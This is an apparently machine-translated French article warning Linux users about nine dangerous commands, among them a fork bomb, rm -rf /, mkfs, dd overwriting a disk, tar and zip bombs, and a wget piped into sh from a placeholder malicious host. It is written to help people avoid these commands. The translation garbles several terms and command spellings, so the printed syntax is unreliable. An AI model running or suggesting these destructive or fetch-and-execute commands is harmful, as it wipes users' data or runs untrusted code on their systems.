9 commandes et codes Linux à prendre en compte
Les commandes shell / terminal Linux sont très puissantes et juste une simple commande pourrait conduire à la suppression d'un dossier, de fichiers ou d'un dossier racine, etc..
Dans certains cas, Linux ne vous demandera même pas de confirmation, mais exécutera immédiatement la commande, ce qui vous causera perdre des données et des informations précieuses stockés dans ces fichiers et dossiers.
Il est courant que des personnes publient du contenu sur le Web. recommander aux nouveaux utilisateurs Linux d'exécuter ces commandes. Cela peut sembler être une blague pour quelqu'un qui a posté le contenu, mais ce n'est pas une question de rire pour la personne à l'autre bout.
Nous avons rassemblé certaines commandes Linux qui sont assez néfastes pour votre système pour vous aider à les éviter. Gardez à l’esprit qu’ils sont vraiment dangereux et peut même être modifié de différentes manières pour produire de nouvelles commandes d'infliger plus de dégâts.
Une chose importante à noter est que certaines de ces commandes ne sont dangereuses que si elles sont préfixées par sudo sur Ubuntu. Alors que sur d'autres distributions de Linux, la plupart de ces commandes seront dangereuses à exécuter en tant que root.
Regardez le 9 commandes et codes que vous devriez éviter d’exécuter.
1. Commande de bombe à la fourche Linux
: () : |: & ;:
aussi connu sous le nom Bombe de fourche est une attaque par déni de service contre un système Linux. : () : |: & ;:
est une fonction bash. Une fois exécuté, il se répète plusieurs fois jusqu'à ce que le système se bloque.
Vous ne pouvez vous en débarrasser qu'en redémarrant votre système. Alors soyez prudent lorsque vous exécutez cette commande sur votre shell Linux.
2. Commande mv folder / dev / null
dossier mv / dev / null
est un autre commandement risqué. Dev / null
ou périphérique nul
est un fichier de périphérique qui supprime toutes les données écrites mais indique que l'opération d'écriture a été exécutée avec succès. Il est également connu comme peu rebondi ou trou noir.
3. commande rm -rf
rm -rf
la commande est un moyen rapide de supprimer un dossier et son contenu dans le système d'exploitation Linux. Si vous ne savez pas comment l'utiliser correctement, cela peut devenir très dangereux pour le système. Les combinaisons et options les plus courantes utilisées avec la commande rm-rf sont répertoriées ci-dessous:
rm
La commande est utilisée pour supprimer les fichiers sous Linux.rm -f
commande supprime les fichiers en lecture seule dans le dossier sans y être invité.rm -r
commande supprime le contenu d'un dossier de manière récursive.rm -d
Cette commande est utilisée pour supprimer un répertoire vide, mais elle refusera de supprimer le répertoire s'il n'est pas vide..rm -rf /
La commande est utilisée pour la suppression forcée (elle la supprime même si elle est protégée en écriture) de tout le contenu du répertoire racine et des sous-dossiers..rm -rf *
Cette commande est utilisée pour la suppression forcée de tout le contenu du répertoire en cours (répertoire dans lequel vous travaillez actuellement) et des sous-dossiers..rm -rf.
Cette commande est utilisée pour la suppression forcée de tout le contenu du dossier et des sous-dossiers en cours. lerm -r. [^.] *
commande peut également être utilisé.rm -i
Cette commande est utilisée pour la suppression de fichiers et de dossiers, mais une invite apparaît avant la suppression..
4. Commande mkfs
mkfs
peut être une commande dangereuse pour votre système Linux si vous ne connaissez pas son objectif. Tout ce qui est écrit après les mkfs sera formaté et remplacé par un système de fichiers Linux vierge..
Toutes les commandes mentionnées ci-dessous vont formater le disque dur et il nécessite des droits d'administrateur:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
La commande mkfs.cramfs
fera la même chose que ce qui précède, mais il ne nécessite pas de droits d'administrateur pour exécuter.
5. Tar Bomb
le le goudron
Cette commande permet de combiner plusieurs fichiers en un seul (fichier archivé) dans .le goudron format. Une bombe Tape Archive (Tar) peut être créée avec cette commande.
Il est un fichier archive qui explose en milliers ou millions de fichiers avec des noms similaires aux fichiers existants dans le répertoire en cours plutôt que dans un nouveau répertoire lorsqu'il est non barré.
Vous pouvez éviter de devenir victime d’une bombe au goudron en créer régulièrement un nouveau répertoire de protection chaque fois que vous recevez un fichier tar puis en déplaçant le fichier tar reçu dans ce répertoire avant de décompresser.
Si le fichier tar est effectivement une bombe tar, vous pouvez simplement supprimer le répertoire que vous venez de créer pour vous en débarrasser. Une autre façon d'éviter l'explosion d'une bombe au goudron consiste à la -t
possibilité de lister tout le contenu d'un fichier tar pour vous donner une idée du type de contenu contenu dans le fichier tar.
6. commande dd
le jj
la commande est utilisée pour copier et convertir des partitions de disque dur. Cependant, cela peut s'avérer dangereux si vous spécifiez la mauvaise destination.
La commande peut être l'une quelconque de celles-ci:
dd si = / dev / hda de = / dev / hdb
dd if = / dev / hda de = / dev / sdb
dd if = quelque chose de = / dev / hda
dd if = quelque chose de = / dev / sda
La commande suivante mettra à zéro le disque dur principal entier: dd if = / dev / zero of = / dev / had
7. Code de script shell
Quelqu'un peut vous victimiser par vous donnant le lien vers un script shell et vous encourageant à télécharger et à l'exécuter. Le script peut contenir du code malveillant ou dangereux. le format de commande peut ressembler à ceci: wget http: // some_malicious_source -O- | sh
. le wget
va télécharger le script pendant que le sh télécharge l'exécution du script.
8. Code source malveillant
Quelqu'un vous donne le code source et vous demande de le compiler. Le code peut sembler être un code normal, mais en fait, un code malveillant est dissimulé dans le code source volumineux et cela pourrait nuire à votre système. Pour éviter d'être victime de ce genre d'attaque, n'acceptez et ne compilez votre code source qu'à partir de sources fiables.
9. bombe de décompression
Vous avez reçu un fichier compressé et il vous est demandé d’extraire ce fichier, qui semble être de très petite taille mais d’une taille de quelques Ko. En réalité, ce fichier compressé de petite taille contient des données très fortement compressées.
Une fois le fichier décompressé, des centaines de Go de données sont extraits, lesquels peut remplir votre disque dur réduire les performances de votre système. Pour éviter cette situation, n'oubliez jamais d'accepter des données provenant de sources fiables..